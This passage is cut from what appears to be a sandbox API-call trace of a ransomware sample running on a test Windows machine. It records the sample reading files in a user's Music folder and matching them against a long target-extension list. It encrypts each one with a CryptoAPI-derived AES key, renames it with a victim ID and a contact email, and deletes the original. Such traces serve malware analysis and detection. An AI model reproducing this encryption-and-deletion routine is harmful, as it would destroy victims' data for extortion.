f.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.607] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.607] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.608] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.611] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x45c7, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x45c7, lpOverlapped=0x0) returned 1
	[0192.616] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.616] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb440) returned 1
	[0192.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.619] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.619] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.619] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.619] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.619] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9030) returned 1
	[0192.619] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.620] CryptEncrypt (in: hKey=0xfb9030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x45c7, dwBufLen=0x45c7 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x45d0) returned 1
	[0192.620] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.621] RtlMoveMemory (in: Destination=0xfe1750, Source=0xfdd180, Length=0x45c7 | out: Destination=0xfe1750) 
	[0192.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.621] CryptEncrypt (in: hKey=0xfb9030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1750*, pdwDataLen=0x18aefc*=0x45c7, dwBufLen=0x45d0 | out: pbData=0xfe1750*, pdwDataLen=0x18aefc*=0x45d0) returned 1
	[0192.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.621] CryptDestroyKey (hKey=0xfb9030) returned 1
	[0192.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.622] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0192.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.622] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0192.622] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.622] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.623] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.624] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0192.625] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.625] WriteFile (in: hFile=0x388, lpBuffer=0xfe1750*, nNumberOfBytesToWrite=0x45d0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe1750*, lpNumberOfBytesWritten=0x18b358*=0x45d0, lpOverlapped=0x0) returned 1
	[0192.630] CloseHandle (hObject=0x388) returned 1
	[0192.630] CloseHandle (hObject=0x2c0) returned 1
	[0192.630] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav")) returned 1
	[0192.634] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav")) returned 0
	[0192.634] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed06fa40, ftCreationTime.dwHighDateTime=0x1d97012, ftLastAccessTime.dwLowDateTime=0xf9e700, ftLastAccessTime.dwHighDateTime=0x1d97627, ftLastWriteTime.dwLowDateTime=0xf9e700, ftLastWriteTime.dwHighDateTime=0x1d97627, nFileSizeHigh=0x0, nFileSizeLow=0x74b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tcbFfTgD3-W7DZc.m4a", cAlternateFileName="TCBFFT~1.M4A")) returned 1
	[0192.634] lstrcmpW (lpString1="tcbFfTgD3-W7DZc.m4a", lpString2="..") returned 1
	[0192.634] lstrcmpW (lpString1="tcbFfTgD3-W7DZc.m4a", lpString2=".") returned 1
	[0192.634] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.634] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="tcbFfTgD3-W7DZc.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\tcbFfTgD3-W7DZc.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\tcbFfTgD3-W7DZc.m4a"
	[0192.634] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\tcbFfTgD3-W7DZc.m4a") returned 64
	[0192.634] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.635] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\tcbFfTgD3-W7DZc.m4a", cchLength=0x40 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a") returned 0x40
	[0192.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.635] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.635] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a"
	[0192.635] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a") returned 64
	[0192.635] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.636] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0192.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.636] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.636] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.637] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.637] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.637] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x74b5, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x74b5, lpOverlapped=0x0) returned 1
	[0192.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.641] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0192.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.662] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.662] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.662] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb92f0) returned 1
	[0192.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
